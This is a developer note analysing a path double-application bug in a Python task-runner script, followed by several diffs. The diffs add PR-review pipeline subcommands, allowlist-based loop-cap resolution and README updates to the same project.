+Surfaced during PR #94 review. Bot flagged `scripts/quest_claude_probe.py:31` — `bridge_script=Path(args.cwd) / args.bridge_script` — for double-applying `cwd` when `--cwd` is relative. Traced it to a real bug: with a relative `--cwd` the subprocess ends up looking for `<cwd>/<cwd>/scripts/quest_claude_bridge.py`.
+
+The concern: this pattern (pre-compute a path by prepending `args.cwd` to a path that will then be passed to a subprocess whose own `cwd` is also `args.cwd`) is a common shape. If it appears in one runner helper it probably appears in others. Worth a sweep.
+
+## The bug, concretely
+
+```python
+# scripts/quest_claude_probe.py:28-35
+result = run_bridge_probe(
+    cwd=args.cwd,
+    quest_dir=args.quest_dir,
+    bridge_script=Path(args.cwd) / args.bridge_script,   # <-- double-applies cwd
+    ...
+)
+```
+
+Downstream, `run_bridge_probe` → `build_bridge_cmd` constructs `cmd = [python, str(bridge_script), ...]` and calls `subprocess.run(cmd, cwd=str(cwd), ...)`. The subprocess resolves `argv[1]` relative to its own `cwd`, which is `args.cwd`. So:
+
+| `args.cwd` | `args.bridge_script` | Computed `bridge_script` | Subprocess lookup |
+|---|---|---|---|
+| `"."` (default) | `"scripts/quest_claude_bridge.py"` | `Path("scripts/quest_claude_bridge.py")` (Path normalizes `Path(".") / x` → `Path(x)`) | `./scripts/quest_claude_bridge.py` — works |
+| `"/abs/path"` | `"scripts/quest_claude_bridge.py"` | `/abs/path/scripts/quest_claude_bridge.py` (absolute) | works |
+| `"repo"` (relative) | `"scripts/quest_claude_bridge.py"` | `Path("repo/scripts/quest_claude_bridge.py")` | subprocess cwd is `repo`, argv resolves to `repo/repo/scripts/quest_claude_bridge.py` — **BROKEN** |
+
+So the bug hides when callers pass `--cwd .` (the default) or `--cwd /abs/...` (absolute). It bites anyone passing a relative non-dot path.
+
+## Fix shape (per call site)
+
+Two options per call site:
+
+**Option A — pass the bridge script path unchanged, let subprocess cwd resolve it.**
+```python
+bridge_script=args.bridge_script,   # leave it as "scripts/quest_claude_bridge.py"
+```
+Simplest. The subprocess cwd is already `args.cwd`, so relative resolution works.
+
+**Option B — pre-resolve to an absolute path with the existing helper.**
+```python
+from quest_runtime.claude_runner import resolve_path
+bridge_script=resolve_path(args.cwd, args.bridge_script),
+```
+Consistent with other code in `claude_runner.py` which already uses `resolve_path` for `quest_dir`, probe artifact paths, etc. Returns an absolute `Path`. Double-apply cannot happen.
+
+**Recommendation:** Option B for consistency with the rest of the runner module, plus it makes the intent explicit ("I want the absolute path now, before it goes through subprocess").
+
+## Sweep scope
+
+The same shape could exist in any of these files. The quest should grep all of them for `Path(args.cwd)`, `Path(.*cwd.*)`, and compare each hit against how the computed path is later consumed (same-cwd subprocess? separate subprocess? just logged?).
+
+- `scripts/quest_claude_probe.py` — **confirmed bug.**
+- `scripts/quest_claude_runner.py` — uses `resolve_path(cwd, ...)` correctly in several places; verify no `Path(cwd) / ...` slipped in.
+- `scripts/quest_claude_bridge.py` — transport script; accepts `--cwd` style args. Check.
+- `scripts/quest_startup_branch.py` — path handling for worktree mode.
+- `scripts/quest_runtime/claude_runner.py` — canonical runner. `resolve_path` lives here, but also grep for any manual `Path(...) / ...` constructions that duplicate subprocess-cwd behavior.
+- `scripts/quest_runtime/pr_review_cycle.py` — we added `_deferred_jsonl_from_backlog` and `allowlist_path_from_context` in this PR. Both walk UP from a context path (no double-apply risk) but worth a second look.
+- `scripts/quest_review_intelligence.py` — CLI wrappers. Check that `--backlog`, `--deferred-jsonl`, `--input`, `--output` are handled consistently.
+
+## Proposed approach
+
+1. **Grep sweep.** Find every `Path(args.cwd)` / `Path(cwd)` / `Path(any_cwd_var)` construction in the runner stack.
+2. **Classify each hit:** does the resulting path flow into a subprocess whose own `cwd` is the same var? If yes, it's the double-apply shape — fix.
+3. **Fix with `resolve_path`** where it exists, or pass unchanged where the helper doesn't apply.
+4. **Regression tests:** add one pytest that drives each corrected call site with a relative `--cwd` value and asserts the subprocess resolves the right file (not a double-nested path). The existing test_pr_review_cycle.py CLI-level pattern (`cwd=cwd_dir, --backlog=<elsewhere>`) is a good template.
+
+## Files expected to change
+
+- `scripts/quest_claude_probe.py` (confirmed — line 31)
+- Any others the grep uncovers (estimated 0–3)
+- New regression test(s) under `tests/unit/` or `tests/integration/` per fixed call site
+
+## Tests
+
+Minimum per fixed call site:
+
+- Pass a relative non-dot `--cwd` value (e.g. `sub/dir`).
+- Set up the expected file at `<cwd>/<bridge_or_target_file>`.
+- Run the helper.
+- Assert the subprocess found the file (no `FileNotFoundError` from a double-applied path).
+
+For the `claude_probe.py` case specifically, that means running the probe helper from a parent directory with `--cwd repo`, where `repo/scripts/quest_claude_bridge.py` exists, and asserting no error.
+
+## Acceptance Criteria
+
+1. Every double-apply site in the runner stack is identified and fixed.
+2. Each fix uses `resolve_path` (the existing helper) where applicable; otherwise passes the path through unchanged.
+3. One regression test per fixed call site, run from a relative non-dot `--cwd`, asserts correct resolution.
+4. Existing absolute-`--cwd` callers and default `--cwd .` callers continue to work unchanged.
+
+## Out of Scope
+
+- Broader refactor of the runner layer.
+- Adding new `--cwd` flags to helpers that don't have them.
+- Workspace/worktree path handling (separate concern, uses `worktree_path`).
+
+## Priority
+
+Medium. The bug only bites callers passing a relative non-dot `--cwd`. Quest itself runs with `--cwd .` by default, so most real invocations are unaffected. But the bug is a latent hazard: anyone who wires the runner into CI or a wrapper script passing a project-root name as `--cwd` will hit it silently.
+
+## Follow-up Quest Prompt (Draft)
+
+```text
+/quest "Sweep runner modules for cwd-relative path double-apply bugs.
+
+Reference: ideas/2026-04-20-runner-cwd-path-hygiene.md
+
+DELIVERABLES
+
+1. Grep the runner stack for every construction of the shape
+   Path(args.cwd) / <path> (or equivalent) where the resulting path is
+   later passed to a subprocess whose own cwd is the same value.
+
+2. Fix each such site by either:
+   - using resolve_path(cwd, path) from scripts/quest_runtime/claude_runner.py, or
+   - passing the path through unchanged (letting subprocess cwd resolve it).
+
+3. Add one pytest regression per fixed site, run with a relative non-dot
+   --cwd value pointing at a fixture tree under tmp_path, asserting the
+   target file resolves correctly (no FileNotFoundError from double-apply).
+
+Known site: scripts/quest_claude_probe.py:31.
+
+OUT OF SCOPE
+
+- Broader runner refactors.
+- Worktree path handling (separate concern)."
+```

--- a/scripts/README.md
+++ b/scripts/README.md
@@ -17,7 +17,7 @@ Build and utility scripts for the Quest repository.
 | `quest_state.py` | Updates `.quest/<id>/state.json` consistently and refreshes `updated_at`. |
 | `quest_startup_branch.py` | Creates the startup branch or worktree for a new quest from `.ai/allowlist.json` and returns machine-readable branch context JSON. |
 | `quest_claude_runner.py` | Runs Claude-designated Quest roles through the additive Codex-host Claude adapter, using `scripts/quest_claude_bridge.py` as transport plus `bypassPermissions`, explicit `--add-dir` access, handoff polling, and `context_health.log` updates. Native Claude-led Quest behavior stays on `Task(...)`. |
-| `quest_review_intelligence.py` | CLI wrapper around review-intelligence helpers (`validate-findings`, `merge-findings`, `build-backlog`, `append-deferred`, `scan-backlog`, `normalize-pr-intake`, `build-fix-batches`, `classify-pr-stop`). |
+| `quest_review_intelligence.py` | CLI wrapper around review-intelligence helpers (`validate-findings`, `merge-findings`, `build-backlog`, `append-deferred`, `scan-backlog`, `normalize-pr-intake`, `select-batch-validation`, `build-fix-batches`, `classify-pr-stop`). |
 | `quest_select_tests.py` | Thin CLI that returns ordered `validation_steps` for a single canonical finding (Level 0/1/2 test-selection heuristic). |
 | `quest_installer.sh` | Installs and updates Quest in any repository. Handles fresh installs, updates, and checksum-based change detection. |
 | `quest_validate-quest-config.sh` | Validates quest configuration files (allowlist JSON schema, role markdown completeness). Used by pre-commit hooks and CI. |
@@ -45,16 +45,25 @@ python3 scripts/quest_claude_probe.py --quest-dir .quest/<id> --model opus
 # Validate canonical findings JSON
 python3 scripts/quest_review_intelligence.py validate-findings --input .quest/<id>/phase_03_review/review_findings.json
 
-# Normalize PR intake into canonical findings
+# PR review pipeline — order matters: validation selection MUST run
+# before batching or build-fix-batches falls back to one-item batches.
+#
+# 1. Normalize PR intake into canonical findings
 python3 scripts/quest_review_intelligence.py normalize-pr-intake --input /tmp/pr_intake.json --output /tmp/review_findings.json
 
-# Build actionable non-overlapping batches from backlog
+# 2. Build the decision backlog
+python3 scripts/quest_review_intelligence.py build-backlog --findings /tmp/review_findings.json --output /tmp/review_backlog.json
+
+# 3. Populate validation_steps on every actionable backlog item IN PLACE
+python3 scripts/quest_review_intelligence.py select-batch-validation --backlog /tmp/review_backlog.json --repo-inventory /tmp/repo_inventory.json
+
+# 4. Build actionable non-overlapping batches (now sees real validation signatures)
 python3 scripts/quest_review_intelligence.py build-fix-batches --backlog /tmp/review_backlog.json --output /tmp/fix_batches.json
 
-# Classify stop conditions and enforce cap retagging when needed
+# 5. Classify stop conditions and enforce cap retagging when needed
 python3 scripts/quest_review_intelligence.py classify-pr-stop --ci-state failing --actionable 2 --iteration 3 --backlog /tmp/review_backlog.json
 
-# Select targeted validation steps for one finding
+# Debug: select targeted validation steps for a single finding (single-finding preview)
 python3 scripts/quest_select_tests.py --finding /tmp/finding.json --repo-inventory /tmp/repo_inventory.json --output /tmp/validation_steps.json
 
 # Run the standard Quest validations and test suite

--- a/scripts/README.md
+++ b/scripts/README.md
@@ -9,6 +9,7 @@ Build and utility scripts for the Quest repository.
 | `quest_dashboard/` | Python package that generates a static HTML Quest Dashboard from journal entries and active quest state. See `quest_dashboard/README.md` for details. |
 | `quest_runtime/` | Python package with Quest orchestration helpers (state updates, Claude bridge runner, handoff polling). |
 | `quest_runtime/review_intelligence.py` | Canonical review-finding schema validation, dedupe/merge helpers, decision backlog policy, deferred JSONL append, and planner backlog scan matching. |
+| `quest_runtime/pr_review_cycle.py` | PR-cycle helpers for canonical intake normalization, actionable batch construction, validation-step selection, loop-stop classification, and cap retagging. |
 | `quest_checks/` | Python package that provides the installed `quest-checks` CLI for running the standard Quest validation and test suite. |
 | `quest_claude_bridge.py` | Thin transport bridge from the current host into Claude CLI for Codex-led Claude-designated Quest roles. |
 | `quest_preflight.sh` | Checks second-model readiness before quest routing. Codex-led Claude probes now retain a recent successful host probe under `.quest/cache/` so later quest starts can reuse it. |
@@ -16,7 +17,8 @@ Build and utility scripts for the Quest repository.
 | `quest_state.py` | Updates `.quest/<id>/state.json` consistently and refreshes `updated_at`. |
 | `quest_startup_branch.py` | Creates the startup branch or worktree for a new quest from `.ai/allowlist.json` and returns machine-readable branch context JSON. |
 | `quest_claude_runner.py` | Runs Claude-designated Quest roles through the additive Codex-host Claude adapter, using `scripts/quest_claude_bridge.py` as transport plus `bypassPermissions`, explicit `--add-dir` access, handoff polling, and `context_health.log` updates. Native Claude-led Quest behavior stays on `Task(...)`. |
-| `quest_review_intelligence.py` | Thin CLI wrapper around `quest_runtime/review_intelligence.py` (`validate-findings`, `merge-findings`, `build-backlog`, `append-deferred`, `scan-backlog`). |
+| `quest_review_intelligence.py` | CLI wrapper around review-intelligence helpers (`validate-findings`, `merge-findings`, `build-backlog`, `append-deferred`, `scan-backlog`, `normalize-pr-intake`, `build-fix-batches`, `classify-pr-stop`). |
+| `quest_select_tests.py` | Thin CLI that returns ordered `validation_steps` for a single canonical finding (Level 0/1/2 test-selection heuristic). |
 | `quest_installer.sh` | Installs and updates Quest in any repository. Handles fresh installs, updates, and checksum-based change detection. |
 | `quest_validate-quest-config.sh` | Validates quest configuration files (allowlist JSON schema, role markdown completeness). Used by pre-commit hooks and CI. |
 | `quest_validate-handoff-contracts.sh` | Validates that role files use the correct handoff contract format (`---HANDOFF---` with STATUS/ARTIFACTS/NEXT/SUMMARY). |
@@ -42,6 +44,18 @@ python3 scripts/quest_claude_probe.py --quest-dir .quest/<id> --model opus
 
 # Validate canonical findings JSON
 python3 scripts/quest_review_intelligence.py validate-findings --input .quest/<id>/phase_03_review/review_findings.json
+
+# Normalize PR intake into canonical findings
+python3 scripts/quest_review_intelligence.py normalize-pr-intake --input /tmp/pr_intake.json --output /tmp/review_findings.json
+
+# Build actionable non-overlapping batches from backlog
+python3 scripts/quest_review_intelligence.py build-fix-batches --backlog /tmp/review_backlog.json --output /tmp/fix_batches.json
+
+# Classify stop conditions and enforce cap retagging when needed
+python3 scripts/quest_review_intelligence.py classify-pr-stop --ci-state failing --actionable 2 --iteration 3 --backlog /tmp/review_backlog.json
+
+# Select targeted validation steps for one finding
+python3 scripts/quest_select_tests.py --finding /tmp/finding.json --repo-inventory /tmp/repo_inventory.json --output /tmp/validation_steps.json
 
 # Run the standard Quest validations and test suite
 quest-checks

--- a/scripts/quest_review_intelligence.py
+++ b/scripts/quest_review_intelligence.py
@@ -9,6 +9,7 @@ from pathlib import Path
 from typing import Any
 
 from quest_runtime.pr_review_cycle import (
+    allowlist_path_from_context,
     build_fix_batches,
     classify_pr_loop_stop,
     normalize_pr_review_intake,
@@ -127,11 +128,14 @@ def _cmd_build_fix_batches(args: argparse.Namespace) -> int:
 
 
 def _cmd_classify_pr_stop(args: argparse.Namespace) -> int:
+    context_for_allowlist = Path(args.backlog) if args.backlog else None
+    allowlist_path = allowlist_path_from_context(context_for_allowlist)
     classification = classify_pr_loop_stop(
         args.ci_state,
         args.actionable,
         args.iteration,
         cap=args.cap,
+        allowlist_path=allowlist_path,
     )
 
     deferred_count = 0

--- a/scripts/quest_review_intelligence.py
+++ b/scripts/quest_review_intelligence.py
@@ -14,6 +14,7 @@ from quest_runtime.pr_review_cycle import (
     classify_pr_loop_stop,
     normalize_pr_review_intake,
     retag_backlog_at_cap,
+    select_validation_steps,
 )
 from quest_runtime.review_intelligence import (
     append_deferred_findings,
@@ -107,6 +108,45 @@ def _cmd_normalize_pr_intake(args: argparse.Namespace) -> int:
     findings = normalize_pr_review_intake(payload)
     _write_json(Path(args.output), findings)
     print(json.dumps({"ok": True, "count": len(findings), "output": args.output}, sort_keys=True))
+    return 0
+
+
+def _cmd_select_batch_validation(args: argparse.Namespace) -> int:
+    backlog_path = Path(args.backlog)
+    payload = _load_json(backlog_path)
+    if not isinstance(payload, dict):
+        raise ValueError("backlog must be a JSON object")
+    items = payload.get("items")
+    if not isinstance(items, list):
+        raise ValueError("backlog JSON object must contain an 'items' list")
+
+    inventory: dict[str, Any] | None = None
+    if args.repo_inventory:
+        inventory_payload = _load_json(Path(args.repo_inventory))
+        if not isinstance(inventory_payload, dict):
+            raise ValueError("repo inventory must be a JSON object")
+        inventory = inventory_payload
+
+    actionable_decisions = {"fix_now", "verify_first"}
+    annotated = 0
+    for item in items:
+        if not isinstance(item, dict):
+            continue
+        if item.get("decision") not in actionable_decisions:
+            continue
+        item["validation_steps"] = select_validation_steps(
+            item, repo_inventory=inventory
+        )
+        annotated += 1
+
+    output_path = Path(args.output) if args.output else backlog_path
+    _write_json(output_path, payload)
+    print(
+        json.dumps(
+            {"ok": True, "annotated": annotated, "output": str(output_path)},
+            sort_keys=True,
+        )
+    )
     return 0
 
 
@@ -245,6 +285,30 @@ def parse_args() -> argparse.Namespace:
     backlog.add_argument("--output", required=True, help="Path to backlog output JSON")
     backlog.add_argument("--at-loop-cap", action="store_true", help="Apply loop-cap decision policy")
     backlog.set_defaults(func=_cmd_build_backlog)
+
+    select_validation = subparsers.add_parser(
+        "select-batch-validation",
+        help=(
+            "For every actionable backlog item, select Level 0/1/2 "
+            "validation_steps and persist them in place on the backlog. "
+            "Must run before build-fix-batches so batching sees real "
+            "validation signatures."
+        ),
+    )
+    select_validation.add_argument(
+        "--backlog", required=True, help="Input review_backlog.json path (updated in place unless --output is given)"
+    )
+    select_validation.add_argument(
+        "--repo-inventory",
+        default=None,
+        help="Optional repo inventory JSON used by select_validation_steps",
+    )
+    select_validation.add_argument(
+        "--output",
+        default=None,
+        help="Optional output path for the annotated backlog (default: overwrite --backlog)",
+    )
+    select_validation.set_defaults(func=_cmd_select_batch_validation)
 
     fix_batches = subparsers.add_parser(
         "build-fix-batches",

--- a/scripts/quest_review_intelligence.py
+++ b/scripts/quest_review_intelligence.py
@@ -55,6 +55,22 @@ def _quest_id_from_backlog_path(backlog_path: Path) -> str:
     return "unknown-quest"
 
 
+def _deferred_jsonl_from_backlog(backlog_path: Path) -> Path:
+    """Derive the repo-local deferred findings JSONL path from a backlog path.
+
+    The backlog typically lives at ``<repo>/.quest/<quest-id>/phase_*/review_backlog.json``.
+    The deferred reservoir is ``<repo>/.quest/backlog/deferred_findings.jsonl``.
+    Walk up the backlog's ancestors to find the ``.quest`` directory and emit
+    the sibling ``backlog/deferred_findings.jsonl`` under it. Falls back to a
+    cwd-relative default if no ``.quest`` ancestor exists.
+    """
+
+    for ancestor in backlog_path.resolve().parents:
+        if ancestor.name == ".quest":
+            return ancestor / "backlog" / "deferred_findings.jsonl"
+    return Path(".quest/backlog/deferred_findings.jsonl")
+
+
 def _cmd_validate_findings(args: argparse.Namespace) -> int:
     findings = _extract_findings(_load_json(Path(args.input)))
     errors = validate_findings(findings)
@@ -145,6 +161,11 @@ def _cmd_classify_pr_stop(args: argparse.Namespace) -> int:
             and str(item.get("finding_id") or "") not in existing_defer_ids
         ]
         if deferred_items:
+            if args.deferred_jsonl is not None:
+                deferred_path = Path(args.deferred_jsonl)
+            else:
+                deferred_path = _deferred_jsonl_from_backlog(backlog_path)
+
             lineage = {
                 "deferred_by_quest": args.deferred_by_quest
                 or _quest_id_from_backlog_path(backlog_path),
@@ -153,7 +174,7 @@ def _cmd_classify_pr_stop(args: argparse.Namespace) -> int:
                 "proposed_followup": args.proposed_followup,
             }
             deferred_count = append_deferred_findings(
-                Path(args.deferred_jsonl),
+                deferred_path,
                 deferred_items,
                 lineage,
             )
@@ -259,8 +280,14 @@ def parse_args() -> argparse.Namespace:
     )
     classify.add_argument(
         "--deferred-jsonl",
-        default=".quest/backlog/deferred_findings.jsonl",
-        help="Deferred findings JSONL path for newly deferred findings",
+        default=None,
+        help=(
+            "Deferred findings JSONL path (default: derived from --backlog, "
+            "walking to the enclosing .quest/ dir and writing to "
+            "<.quest>/backlog/deferred_findings.jsonl; falls back to "
+            ".quest/backlog/deferred_findings.jsonl relative to cwd when no "
+            "backlog is supplied)"
+        ),
     )
     classify.add_argument(
         "--deferred-by-quest",

--- a/scripts/quest_review_intelligence.py
+++ b/scripts/quest_review_intelligence.py
@@ -9,7 +9,6 @@ from pathlib import Path
 from typing import Any
 
 from quest_runtime.pr_review_cycle import (
-    DEFAULT_LOOP_CAP,
     build_fix_batches,
     classify_pr_loop_stop,
     normalize_pr_review_intake,
@@ -242,7 +241,12 @@ def parse_args() -> argparse.Namespace:
     )
     classify.add_argument("--actionable", required=True, type=int, help="Open actionable backlog count")
     classify.add_argument("--iteration", required=True, type=int, help="Current iteration number")
-    classify.add_argument("--cap", default=DEFAULT_LOOP_CAP, type=int, help="Iteration cap")
+    classify.add_argument(
+        "--cap",
+        default=None,
+        type=int,
+        help="Iteration cap (default: allowlist gates.max_fix_iterations)",
+    )
     classify.add_argument(
         "--backlog",
         default=None,

--- a/scripts/quest_review_intelligence.py
+++ b/scripts/quest_review_intelligence.py
@@ -8,6 +8,13 @@ import sys
 from pathlib import Path
 from typing import Any
 
+from quest_runtime.pr_review_cycle import (
+    DEFAULT_LOOP_CAP,
+    build_fix_batches,
+    classify_pr_loop_stop,
+    normalize_pr_review_intake,
+    retag_backlog_at_cap,
+)
 from quest_runtime.review_intelligence import (
     append_deferred_findings,
     build_review_backlog,
@@ -38,6 +45,17 @@ def _write_json(path: Path, payload: Any) -> None:
     path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
 
 
+def _quest_id_from_backlog_path(backlog_path: Path) -> str:
+    parts = backlog_path.parts
+    if ".quest" in parts:
+        quest_index = parts.index(".quest")
+        if quest_index + 1 < len(parts):
+            candidate = parts[quest_index + 1]
+            if candidate and candidate != "backlog":
+                return candidate
+    return "unknown-quest"
+
+
 def _cmd_validate_findings(args: argparse.Namespace) -> int:
     findings = _extract_findings(_load_json(Path(args.input)))
     errors = validate_findings(findings)
@@ -63,6 +81,87 @@ def _cmd_build_backlog(args: argparse.Namespace) -> int:
     backlog = build_review_backlog(findings, at_loop_cap=args.at_loop_cap)
     _write_json(Path(args.output), backlog)
     print(json.dumps({"ok": True, "count": len(backlog["items"]), "output": args.output}, sort_keys=True))
+    return 0
+
+
+def _cmd_normalize_pr_intake(args: argparse.Namespace) -> int:
+    payload = _load_json(Path(args.input))
+    if not isinstance(payload, dict):
+        raise ValueError("expected intake JSON object")
+    findings = normalize_pr_review_intake(payload)
+    _write_json(Path(args.output), findings)
+    print(json.dumps({"ok": True, "count": len(findings), "output": args.output}, sort_keys=True))
+    return 0
+
+
+def _cmd_build_fix_batches(args: argparse.Namespace) -> int:
+    payload = _load_json(Path(args.backlog))
+    if isinstance(payload, dict):
+        items = payload.get("items")
+        if not isinstance(items, list):
+            raise ValueError("backlog JSON object must contain an 'items' list")
+    elif isinstance(payload, list):
+        items = payload
+    else:
+        raise ValueError("backlog must be a list or an object with an 'items' list")
+
+    batches = build_fix_batches(items)
+    _write_json(Path(args.output), batches)
+    print(json.dumps({"ok": True, "count": len(batches), "output": args.output}, sort_keys=True))
+    return 0
+
+
+def _cmd_classify_pr_stop(args: argparse.Namespace) -> int:
+    classification = classify_pr_loop_stop(
+        args.ci_state,
+        args.actionable,
+        args.iteration,
+        cap=args.cap,
+    )
+
+    deferred_count = 0
+    should_retag = bool(classification["stop"] and classification["retag_required"])
+    if should_retag and args.backlog:
+        backlog_path = Path(args.backlog)
+        payload = _load_json(backlog_path)
+        if not isinstance(payload, dict):
+            raise ValueError("backlog must be a JSON object")
+
+        existing_defer_ids = {
+            str(item.get("finding_id") or "")
+            for item in payload.get("items", [])
+            if isinstance(item, dict) and item.get("decision") == "defer"
+        }
+
+        retagged = retag_backlog_at_cap(payload)
+        _write_json(backlog_path, retagged)
+        if args.retag_output:
+            _write_json(Path(args.retag_output), retagged)
+
+        deferred_items = [
+            item
+            for item in retagged.get("items", [])
+            if isinstance(item, dict)
+            and item.get("decision") == "defer"
+            and str(item.get("finding_id") or "") not in existing_defer_ids
+        ]
+        if deferred_items:
+            lineage = {
+                "deferred_by_quest": args.deferred_by_quest
+                or _quest_id_from_backlog_path(backlog_path),
+                "deferred_at": args.deferred_at or utc_now_iso(),
+                "defer_reason": args.defer_reason,
+                "proposed_followup": args.proposed_followup,
+            }
+            deferred_count = append_deferred_findings(
+                Path(args.deferred_jsonl),
+                deferred_items,
+                lineage,
+            )
+
+    payload = dict(classification)
+    payload["deferred_count"] = deferred_count
+    print(json.dumps(payload, sort_keys=True))
     return 0
 
 
@@ -100,6 +199,14 @@ def parse_args() -> argparse.Namespace:
     parser = argparse.ArgumentParser(description=__doc__)
     subparsers = parser.add_subparsers(dest="command", required=True)
 
+    normalize = subparsers.add_parser(
+        "normalize-pr-intake",
+        help="Normalize PR intake JSON into canonical findings",
+    )
+    normalize.add_argument("--input", required=True, help="PR intake JSON path")
+    normalize.add_argument("--output", required=True, help="Path to normalized findings JSON")
+    normalize.set_defaults(func=_cmd_normalize_pr_intake)
+
     validate = subparsers.add_parser("validate-findings", help="Validate canonical findings JSON")
     validate.add_argument("--input", required=True, help="Path to findings JSON file")
     validate.set_defaults(func=_cmd_validate_findings)
@@ -114,6 +221,64 @@ def parse_args() -> argparse.Namespace:
     backlog.add_argument("--output", required=True, help="Path to backlog output JSON")
     backlog.add_argument("--at-loop-cap", action="store_true", help="Apply loop-cap decision policy")
     backlog.set_defaults(func=_cmd_build_backlog)
+
+    fix_batches = subparsers.add_parser(
+        "build-fix-batches",
+        help="Build non-overlapping actionable fix batches from backlog items",
+    )
+    fix_batches.add_argument("--backlog", required=True, help="Input review_backlog.json path")
+    fix_batches.add_argument("--output", required=True, help="Path to fix-batches output JSON")
+    fix_batches.set_defaults(func=_cmd_build_fix_batches)
+
+    classify = subparsers.add_parser(
+        "classify-pr-stop",
+        help="Classify PR loop stop conditions and retag backlog at cap when required",
+    )
+    classify.add_argument(
+        "--ci-state",
+        required=True,
+        choices=["green", "failing", "pending", "unknown"],
+        help="Current CI state",
+    )
+    classify.add_argument("--actionable", required=True, type=int, help="Open actionable backlog count")
+    classify.add_argument("--iteration", required=True, type=int, help="Current iteration number")
+    classify.add_argument("--cap", default=DEFAULT_LOOP_CAP, type=int, help="Iteration cap")
+    classify.add_argument(
+        "--backlog",
+        default=None,
+        help="Optional review_backlog.json path for in-place cap retagging",
+    )
+    classify.add_argument(
+        "--retag-output",
+        default=None,
+        help="Optional path to write a copy of the retagged backlog",
+    )
+    classify.add_argument(
+        "--deferred-jsonl",
+        default=".quest/backlog/deferred_findings.jsonl",
+        help="Deferred findings JSONL path for newly deferred findings",
+    )
+    classify.add_argument(
+        "--deferred-by-quest",
+        default=None,
+        help="Quest id used for deferred lineage (defaults from backlog path)",
+    )
+    classify.add_argument(
+        "--deferred-at",
+        default=None,
+        help="ISO8601 UTC timestamp for deferred lineage (default: now)",
+    )
+    classify.add_argument(
+        "--defer-reason",
+        default="Loop cap reached during PR review cycle.",
+        help="Deferred lineage reason",
+    )
+    classify.add_argument(
+        "--proposed-followup",
+        default="Create a follow-up quest to resolve deferred review findings.",
+        help="Deferred lineage follow-up recommendation",
+    )
+    classify.set_defaults(func=_cmd_classify_pr_stop)
 
     append = subparsers.add_parser(
         "append-deferred",

--- a/scripts/quest_runtime/pr_review_cycle.py
+++ b/scripts/quest_runtime/pr_review_cycle.py
@@ -29,6 +29,7 @@ CI_FAILURE_STATES = (
     "cancelled",
     "timed_out",
     "action_required",
+    "startup_failure",
 )
 
 

--- a/scripts/quest_runtime/pr_review_cycle.py
+++ b/scripts/quest_runtime/pr_review_cycle.py
@@ -32,6 +32,29 @@ CI_FAILURE_STATES = (
 )
 
 
+def allowlist_path_from_context(context_path: Path | None) -> Path:
+    """Find ``.ai/allowlist.json`` in the enclosing repo of ``context_path``.
+
+    Walks up from ``context_path`` (a path known to live inside the target
+    repo, typically the backlog or a quest artifact) and returns the first
+    ancestor that contains ``.ai/allowlist.json``. Falls back to the
+    module-level cwd-relative default when no context is given or no
+    enclosing repo is found.
+    """
+
+    if context_path is None:
+        return _ALLOWLIST_PATH
+    try:
+        resolved_parents = context_path.resolve().parents
+    except (OSError, RuntimeError):
+        return _ALLOWLIST_PATH
+    for ancestor in resolved_parents:
+        candidate = ancestor / ".ai" / "allowlist.json"
+        if candidate.exists():
+            return candidate
+    return _ALLOWLIST_PATH
+
+
 def resolve_loop_cap(allowlist_path: Path | None = None) -> int:
     """Resolve the PR fix-loop cap from the allowlist; fall back to FALLBACK_LOOP_CAP."""
 
@@ -611,11 +634,17 @@ def classify_pr_loop_stop(
     iteration: int,
     *,
     cap: int | None = None,
+    allowlist_path: Path | None = None,
 ) -> dict[str, Any]:
     """Classify whether the PR fix loop should stop and whether retagging is required.
 
-    When ``cap`` is ``None`` the value is resolved from ``.ai/allowlist.json``
-    (``gates.max_fix_iterations``), falling back to ``FALLBACK_LOOP_CAP``.
+    When ``cap`` is ``None`` the value is resolved from the allowlist at
+    ``allowlist_path`` (``gates.max_fix_iterations``), falling back to
+    ``FALLBACK_LOOP_CAP``. When ``allowlist_path`` is ``None`` the module
+    default (``.ai/allowlist.json`` relative to cwd) is used; callers that
+    know the target repo context should pass an explicit path (see
+    ``allowlist_path_from_context``) so cap enforcement honors that repo's
+    configured gate regardless of cwd.
     """
 
     normalized_state = (ci_state or "").strip().lower()
@@ -624,7 +653,7 @@ def classify_pr_loop_stop(
 
     actionable = max(0, int(actionable_count))
     current_iteration = max(0, int(iteration))
-    resolved_cap = cap if cap is not None else resolve_loop_cap()
+    resolved_cap = cap if cap is not None else resolve_loop_cap(allowlist_path)
     max_iterations = max(1, int(resolved_cap))
 
     if normalized_state == "green" and actionable == 0 and current_iteration <= max_iterations:

--- a/scripts/quest_runtime/pr_review_cycle.py
+++ b/scripts/quest_runtime/pr_review_cycle.py
@@ -3,6 +3,7 @@
 from __future__ import annotations
 
 import copy
+import json
 from pathlib import Path, PurePosixPath
 from typing import Any
 
@@ -16,8 +17,27 @@ from quest_runtime.review_intelligence import (
 
 INTAKE_SOURCES = ("ci_check", "inline_comment", "general_comment", "existing_finding")
 BLOCKER_KEYWORDS = ("blocker", "blocking", "critical")
-DEFAULT_LOOP_CAP = 3
+_BLOCKER_TOKEN_STRIP = ".,:;!?()[]{}\"'"
+FALLBACK_LOOP_CAP = 3
+_ALLOWLIST_PATH = Path(".ai/allowlist.json")
 CI_GREEN_STATES = ("green",)
+
+
+def resolve_loop_cap(allowlist_path: Path | None = None) -> int:
+    """Resolve the PR fix-loop cap from the allowlist; fall back to FALLBACK_LOOP_CAP."""
+
+    path = allowlist_path if allowlist_path is not None else _ALLOWLIST_PATH
+    try:
+        data = json.loads(path.read_text(encoding="utf-8"))
+    except (OSError, ValueError):
+        return FALLBACK_LOOP_CAP
+    gates = data.get("gates") if isinstance(data, dict) else None
+    if not isinstance(gates, dict):
+        return FALLBACK_LOOP_CAP
+    value = gates.get("max_fix_iterations")
+    if isinstance(value, bool) or not isinstance(value, int) or value < 1:
+        return FALLBACK_LOOP_CAP
+    return value
 
 _ACTIONABLE_DECISIONS = {"fix_now", "verify_first"}
 _SHARED_INFRA_KINDS = {"build_failure", "shared_infrastructure", "cross_cutting"}
@@ -121,11 +141,11 @@ def normalize_pr_review_intake(intake: dict[str, list[dict[str, Any]]]) -> list[
         path = str(comment.get("path") or "").strip() or "pr/inline"
         line = _finding_line(comment.get("line"))
         body_lower = body.lower()
-        severity = (
-            "high"
-            if any(keyword in body_lower for keyword in BLOCKER_KEYWORDS)
-            else "medium"
-        )
+        tokens = {
+            token.strip(_BLOCKER_TOKEN_STRIP)
+            for token in body_lower.split()
+        }
+        severity = "high" if tokens & set(BLOCKER_KEYWORDS) else "medium"
